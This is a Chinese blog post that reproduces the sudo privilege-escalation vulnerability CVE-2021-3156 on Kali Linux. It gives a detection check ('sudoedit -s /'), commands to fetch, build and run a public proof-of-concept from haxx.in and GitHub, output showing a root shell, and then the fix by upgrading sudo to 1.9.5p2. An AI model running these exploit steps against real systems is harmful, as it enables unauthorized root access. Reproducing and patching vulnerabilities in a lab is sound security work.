【CVE-2021-3156】linux sudo提权复现及补丁修复

最新推荐文章于 2024-02-29 15:25:29 发布

redwand

最新推荐文章于 2024-02-29 15:25:29 发布

阅读量3.7k

点赞数 1

分类专栏：渗透

本文链接：https://blog.csdn.net/redwand/article/details/113524058

版权

渗透专栏收录该内容

29 篇文章 10 订阅

订阅专栏

前言

今天安全圈都在刷屏【CVE-2021-3156】这个漏洞，由于这是一个缓冲区溢出漏洞，通用性比较强，因此也跟风实验一下，详细复现及修复过程如下。

一、实验环境

操作系统：kali-linux-2020.1b

1、adduser命令新建一个低权限用户

root@kali:~# adduser test
Adding user `test' ...
Adding new group `test' (1001) ...
Adding new user `test' (1001) with group `test' ...
Creating home directory `/home/test' ...
Copying files from `/etc/skel' ...
New password: 
Retype new password: 
passwd: password updated successfully
Changing the user information for test
Enter the new value, or press ENTER for the default
	Full Name []: 
	Room Number []: 
	Work Phone []: 
	Home Phone []: 
	Other []: 
Is the information correct? [Y/n]

2、/etc/sudoers添加记录

#
# This file MUST be edited with the 'visudo' command as root.
#
# Please consider adding local content in /etc/sudoers.d/ instead of
# directly modifying this file.
#
# See the man page for details on how to write a sudoers file.
#
Defaults        env_reset
Defaults        mail_badpass
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

# Host alias specification

# User alias specification

# Cmnd alias specification

# User privilege specification
root    ALL=(ALL:ALL) ALL

# Allow members of group sudo to execute any command
%sudo   ALL=(ALL:ALL) ALL

# See sudoers(5) for more information on "#include" directives:

#includedir /etc/sudoers.d

test    ALL=(root)      NOPASSWD:/usr/sbin/useradd,/usr/sbin/usermod

3、测试漏洞存在

影响版本

Sudo 1.8.2 - 1.8.31p2
Sudo 1.9.0 - 1.9.5p1

查看版本

test@kali:~/CVE-2021-3156$ sudo --version
Sudo version 1.8.29
Sudoers policy plugin version 1.8.29
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.29

漏洞检测

若返回以“ sudoedit：”开头的错误，则存在漏洞。
若返回以“ usage：”开头的错误，则不受影响

root@kali:~# sudoedit -s /
sudoedit: /: not a regular file

二、漏洞复现

1、下载exp

此次使用的是kali，sudo版本为：1.8.29。漏洞poc：https://haxx.in/CVE-2021-3156nsspoc_ubuntu.tar.gz，在普通用户下执行下列命令。

tar -xvzf CVE-2021-3156_nss_poc_ubuntu.tar.gz
cd CVE-2021-3156/
make && ./sudo-hax-me-a-sandwich 0

2、执行结果

test@kali:~$ tar -xvzf CVE-2021-3156_nss_poc_ubuntu.tar.gz
CVE-2021-3156/
CVE-2021-3156/hax.c
CVE-2021-3156/Makefile
CVE-2021-3156/lib.c
test@kali:~$ cd CVE-2021-3156/
test@kali:~/CVE-2021-3156$ ls
hax.c  lib.c  Makefile
test@kali:~/CVE-2021-3156$ make && ./sudo-hax-me-a-sandwich 0
rm -rf libnss_X
mkdir libnss_X
gcc -o sudo-hax-me-a-sandwich hax.c
gcc -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c
**** CVE-2021-3156 PoC by blasty <peter@haxx.in>
[+] bl1ng bl1ng! We got it!
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root),1001(test)
#

至此，提权成功

3、github

由于上面的exp已经无法下载，也可以使用github上的复现一下

root@kali:~# su - test
test@kali:~$ git clone https://github.com/blasty/CVE-2021-3156.git
Cloning into 'CVE-2021-3156'...
remote: Enumerating objects: 50, done.
remote: Counting objects: 100% (50/50), done.
remote: Compressing objects: 100% (35/35), done.
remote: Total 50 (delta 25), reused 38 (delta 15), pack-reused 0
Unpacking objects: 100% (50/50), done.
test@kali:~$ cd CVE-2021-3156/
test@kali:~/CVE-2021-3156$ ls
brute.sh  hax.c  lib.c  Makefile  README.md
test@kali:~/CVE-2021-3156$ make
rm -rf libnss_X
mkdir libnss_X
gcc -std=c99 -o sudo-hax-me-a-sandwich hax.c
gcc -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c
test@kali:~/CVE-2021-3156$ ls
brute.sh  hax.c  lib.c  libnss_X  Makefile  README.md  sudo-hax-me-a-sandwich
test@kali:~/CVE-2021-3156$ ./sudo-hax-me-a-sandwich 0

** CVE-2021-3156 PoC by blasty <peter@haxx.in>

using target: Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27 ['/usr/bin/sudoedit'] (56, 54, 63, 212)
** pray for your rootshell.. **
[+] bl1ng bl1ng! We got it!
# id
uid=0(root) gid=0(root) groups=0(root),1001(test)
# whoami
root
#

三、漏洞修复

官网https://www.sudo.ws/dist/sudo-1.9.5p2.tar.gz，下载最新版本sudo软件tar包，并解压

tar zxvf sudo-1.9.5p2.tar.gz

进入解压目录，执行编译命令

./configure --prefix=/usr --libexecdir=/usr/lib --with-secure-path --with-all-insults --with-env-editor --docdir=/usr/share/doc/sudo-1.9.5p2 --with-passprompt="[sudo] password for %p: " && make && make install && ln -sfv libsudo_util.so.0.0.0 /usr/lib/sudo/libsudo_util.so.0

编译成功后，查看版本

root@kali:~/sudo-1.9.5p2# sudo --version
Sudo version 1.9.5p2
Configure options: --prefix=/usr --libexecdir=/usr/lib --with-secure-path --with-all-insults --with-env-editor --docdir=/usr/share/doc/sudo-1.9.5p2 --with-passprompt=[sudo] password for %p: 
Sudoers policy plugin version 1.9.5p2
Sudoers file grammar version 48
...
...
Sudoers I/O plugin version 1.9.5p2
Sudoers audit plugin version 1.9.5p

再次测试漏洞，无法成功

test@kali:~/CVE-2021-3156$ make && ./sudo-hax-me-a-sandwich 0
rm -rf libnss_X
mkdir libnss_X
gcc -o sudo-hax-me-a-sandwich hax.c
gcc -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c
**** CVE-2021-3156 PoC by blasty <peter@haxx.in>
usage: sudoedit [-AknS] [-C num] [-D directory] [-g group] [-h host] [-p prompt] [-R directory] [-T timeout] [-u user] file ...

root下测试漏洞，不受影响

root@kali:~# sudoedit -s /
usage: sudoedit [-AknS] [-C num] [-D directory] [-g group] [-h host] [-p prompt] [-R directory] [-T timeout] [-u user] file ...